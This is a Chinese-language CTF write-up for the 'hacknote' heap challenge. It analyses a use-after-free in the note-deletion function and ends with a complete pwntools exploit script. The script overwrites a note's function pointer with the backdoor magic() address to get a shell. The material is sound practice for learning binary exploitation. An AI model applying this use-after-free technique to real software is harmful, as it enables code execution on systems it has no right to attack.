IDA,F5
main函数
add_note 函数
notelist是4字节。在源代码中,每个notelist[i]装的是新malloc的地址。
*notelist指向这个地址的内容。
*notelist[i]=print_note_content ,print_note_content又是4个字节。
v1指针指向notelist[0]的内容,即新的malloc地址。那么*notelist内容就可以被分为v1[0]和v1[1]。v1[0]的内容是print_note_content返回值。
v1[1]=malloc(size),即v1[1]里面又装着一个新的chunk地址。
delnote 函数
free两次,没有设置为null,存在UAF漏洞。
此题留有后门函数:
print_note函数
这个函数打印的是第一个chunk的v1[0]部分,也就是print_note_content的地址。
分析
这个题可以想办法把v1[0]的内容,由print_note_content()地址变成magic()函数地址。
这里可以先add note两次,那么,就产生了4个chunk。注意,chunk content一定要比chunk p大。
del note(0)把notelist[0]所连的2个chunkfree掉。因为两个chunk大小不同,会被链在不同的串上。一个是0x10,一个是0x18。
del note(1)把notelist[1]所连的2个chunkfree掉。
可以想到,0x10所连的2个chunk分别是chunk p1和chunk p2。
接着调用add note,设定传送的大小是0x8,而0x8+0x4+0x4=0x10,正好可以分配chunk p2和chunk p1。
不要忘了add note函数的功能:可以把两个chunk链接起来
chunk p2的v1[1]的内容是chunk p1的地址。chunk p2 作为新的chunk p,chunk p1 是chunk content。所以在写入chunk content时,把magic函数作为内容写入。最后利用print_note()函数读取notelist[0]的v1[0]。最后拿到shell。所以此时chunk p1和chunk p2的关系是:
解题代码
from pwn import *
context.log_level = 'debug'
p = process('./hacknote')
elf = ELF('./hacknote')
def add(size,content='aaaa'):
p.sendlineafter(':','1')
p.sendlineafter(':',str(size))
p.sendlineafter(':',content)
def delete(index):
p.sendlineafter(':','2')
p.sendlineafter(':',str(index))
def show(index):
p.sendlineafter(':','3')
p.sendlineafter(':',str(index))
def dbg():
gdb.attach(p)
pause()
sh = p32(elf.sym['magic'])
add(0x10)
add(0x10)
#dbg()
delete(0)
#dbg()
delete(1)
#dbg()
add(0x8,sh)
#dbg()
show(0)
#dbg()
p.interactive()
大功告成
这道题绕来绕去好晕啊~吃饭去啦!